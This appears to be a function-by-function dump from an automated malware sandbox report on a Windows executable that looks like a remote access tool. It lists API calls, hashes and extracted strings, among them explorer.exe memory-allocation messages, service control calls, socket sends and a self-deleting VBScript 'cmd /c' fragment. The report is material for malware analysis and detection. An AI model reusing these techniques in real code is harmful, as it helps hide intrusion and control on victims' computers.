                                        • String ID: \ws2_32$\wship6$getaddrinfo
                                        • API String ID: 2490988753-3078833738
                                        • Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                        • Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
                                        • Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
                                        • Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
                                        Function 0045007D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 004500C1
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                          • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                        • _free.LIBCMT ref: 004500B6
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 004500D8
                                        • _free.LIBCMT ref: 004500ED
                                        • _free.LIBCMT ref: 004500F8
                                        • _free.LIBCMT ref: 0045011A
                                        • _free.LIBCMT ref: 0045012D
                                        • _free.LIBCMT ref: 0045013B
                                        • _free.LIBCMT ref: 00450146
                                        • _free.LIBCMT ref: 0045017E
                                        • _free.LIBCMT ref: 00450185
                                        • _free.LIBCMT ref: 004501A2
                                        • _free.LIBCMT ref: 004501BA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                        • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                        • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                        • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                        Function 00419138 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0041913D
                                        • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                        • Sleep.KERNEL32(000003E8), ref: 0041927D
                                        • GetLocalTime.KERNEL32(?), ref: 0041928C
                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                        • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                        • API String ID: 489098229-65789007
                                        • Opcode ID: 9197c4a2a1c1e5ce950a89398449fe3ef2bf9bb46c4814cba73f7eb8f52c582d
                                        • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                        • Opcode Fuzzy Hash: 9197c4a2a1c1e5ce950a89398449fe3ef2bf9bb46c4814cba73f7eb8f52c582d
                                        • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                        Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                        • ExitProcess.KERNEL32 ref: 0040C832
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                        • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                        • API String ID: 1913171305-390638927
                                        • Opcode ID: 9d9593f7d2fff8419b7a4165c874335f1e1c4ca55b8004b043af397299dbfd4c
                                        • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                        • Opcode Fuzzy Hash: 9d9593f7d2fff8419b7a4165c874335f1e1c4ca55b8004b043af397299dbfd4c
                                        • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                        Function 0044F3F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                        • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                        • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                        • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                        Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                        • closesocket.WS2_32(000000FF), ref: 0040481F
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                        • String ID:
                                        • API String ID: 3658366068-0
                                        • Opcode ID: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                        • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                        • Opcode Fuzzy Hash: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                        • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
                                        Function 00454992 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                        • GetLastError.KERNEL32 ref: 00454AA6
                                        • __dosmaperr.LIBCMT ref: 00454AAD
                                        • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                        • GetLastError.KERNEL32 ref: 00454AC3
                                        • __dosmaperr.LIBCMT ref: 00454ACC
                                        • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                        • CloseHandle.KERNEL32(?), ref: 00454C36
                                        • GetLastError.KERNEL32 ref: 00454C68
                                        • __dosmaperr.LIBCMT ref: 00454C6F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                        • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                        • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                        • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                        Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 65535$udp
                                        • API String ID: 0-1267037602
                                        • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                        • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                        • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                        • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                        Function 00416E27 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 107filesynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                        • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                        • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                        • String ID: <$@$@FG$@FG$TUF$Temp
                                        • API String ID: 1107811701-4124992407
                                        • Opcode ID: 2ef96a9cb1d95fb64f0202d71f3a89862d1029e439683586224ce07dc8cb56e9
                                        • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                        • Opcode Fuzzy Hash: 2ef96a9cb1d95fb64f0202d71f3a89862d1029e439683586224ce07dc8cb56e9
                                        • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                        Function 00406616 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                        • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe), ref: 00406705
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentProcess
                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$pUF$windir$BG3i@
                                        • API String ID: 2050909247-1144799832
                                        • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                        • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                        • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                        • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                        Function 00439371 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                        • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                        • __dosmaperr.LIBCMT ref: 004393DD
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                        • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                        • __dosmaperr.LIBCMT ref: 0043941A
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                        • __dosmaperr.LIBCMT ref: 0043946E
                                        • _free.LIBCMT ref: 0043947A
                                        • _free.LIBCMT ref: 00439481
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                        • String ID:
                                        • API String ID: 2441525078-0
                                        • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                        • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                        • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                        • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                        Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 00404E71
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                        • TranslateMessage.USER32(?), ref: 00404F30
                                        • DispatchMessageA.USER32(?), ref: 00404F3B
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 2956720200-749203953
                                        • Opcode ID: ed276ae60632ddb1123add7be1ccbfba2608c39a5df5d2a815a288664d31e13e
                                        • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                        • Opcode Fuzzy Hash: ed276ae60632ddb1123add7be1ccbfba2608c39a5df5d2a815a288664d31e13e
                                        • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                        Function 00419C95 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        • Opcode ID: 83979f30ba13052199b290374f4e897ff0c223aa30bace9cb26b013bf86a6d8f
                                        • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                        • Opcode Fuzzy Hash: 83979f30ba13052199b290374f4e897ff0c223aa30bace9cb26b013bf86a6d8f
                                        • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                        Function 00446DDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00446DEF
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 00446DFB
